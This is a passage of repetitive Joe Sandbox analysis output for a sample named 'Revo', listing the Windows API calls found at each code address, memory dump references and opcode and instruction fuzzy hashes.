                                                                                                                                              • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                              • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B67
                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2567322000-0
                                                                                                                                              • Opcode ID: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                              • Instruction ID: 0a43b9f96fb2b6b0c204ab13ec475b47687dff995c0faea4a1be46f6685e1a01
                                                                                                                                              • Opcode Fuzzy Hash: 8ff07581d1a9b179a96ae9e6ed15c74e4a8339333c72220da53f642c9193dd0c
                                                                                                                                              • Instruction Fuzzy Hash: AFE09271600218BBDB00AB54CD01EDE7B6ADB45700F104036B601B6190D6B5AE62DA98
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000408,?,00000000,00404259), ref: 00404618
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID: x
                                                                                                                                              • API String ID: 3850602802-2363233923
                                                                                                                                              • Opcode ID: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                              • Instruction ID: 02f239cb91824dfe0454512e4452fc65e03e49c46eb4308609c978d489441530
                                                                                                                                              • Opcode Fuzzy Hash: 6310f7611cc1ccfcf56369dd3329cceb302aac59914c28262eb7105b2c2a6a3a
                                                                                                                                              • Instruction Fuzzy Hash: 8EC01271684200ABCA005B81EE00F177B20B7A5B02F20C87AF380200B096B6A461DB1E
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                              • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                              • Opcode Fuzzy Hash: a5b36690e1ac02c72154c1ce5afa4b759e3a614c42b0341cc97078f1712af449
                                                                                                                                              • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                              • Opcode ID: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                              • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                              • Opcode Fuzzy Hash: 95617658206366d970ee8daf205e3d31f177179551792a2a17772dbb13571d5c
                                                                                                                                              • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                              • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                              • Opcode Fuzzy Hash: 1c769ba05c80f99646182a67dd2a9d7b609c2e0eeef89cc1e8ace76a876f498b
                                                                                                                                              • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405CC8: ShellExecuteExW.SHELL32(?), ref: 00405CD7
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 165873841-2766056989
                                                                                                                                              • Opcode ID: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                              • Instruction ID: fada87d5783261b67c1888f8bede04a63cf771d19a625931ff974fd18e721819
                                                                                                                                              • Opcode Fuzzy Hash: e742f24370eeb6c79a6e3be1c19ad95986f761f1fedb39cce3e5cc15d6c6f8bb
                                                                                                                                              • Instruction Fuzzy Hash: E0112B71E142198ADB10EFB9CA4AB8DB7F0AF04308F20457FE545F72D2DBB889449B18
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                              • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                              APIs
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040580A
                                                                                                                                                • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 00405856
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                              • Opcode ID: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                              • Instruction ID: 75974562a342b4767595fe941f1b5a5caa8115d748db5a0a183e84b8e7df0fb7
                                                                                                                                              • Opcode Fuzzy Hash: 691039c818a67b31f98599bc9a66305e369ba1548cb07ccd7a3140e409cbdcf5
                                                                                                                                              • Instruction Fuzzy Hash: 71F090739015008AE74177A5AD01B2677A4EB98709F06847AEFC4B22B0E7B948118E5E
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                              • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                              APIs
                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
• Instruction ID: ce97bb54dc56410027eb81a7581dc46f0de68bed8411b1f66f85bdadb8ab3b17
• Opcode Fuzzy Hash: d0188487546d0aa2d07df64ecb57d90e690e89e3614f878a6311feaccaca8818
• Instruction Fuzzy Hash: 7DE04876908610DFE744EBA4AE495AE73B4EF84365710097FE041F11D1D7B94D00965D
APIs
• DispatchMessageW.USER32(?), ref: 00406AE9
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00406AF9
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Message$DispatchPeek
• String ID:
• API String ID: 1770753511-0
• Opcode ID: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
• Instruction ID: 1ddfa30a50b64daf61bbb77bbc73644e1ad8712fad2235fac67661dc563a41bf
• Opcode Fuzzy Hash: 454023410e24b941cb85301e3ae29d468fd74800f29e5bcbc5c5f96efbc0212a
• Instruction Fuzzy Hash: 8CE08673A01119A7CE00B6A99D05ECB777C9B95750F014036FA01F3084E674E5028AB8
APIs
• CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
• CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
• Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
• Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
• Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
• GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
  • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
  • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
  • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
• Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
• Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
• Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
APIs
• FreeLibrary.KERNEL32(?,76F93420,00000000,76F92EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
• GlobalFree.KERNEL32(00000000), ref: 00403D00
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID:
• API String ID: 1100898210-0
• Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
• Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
• Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
• Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
APIs
• GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
• CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
Memory Dump Source
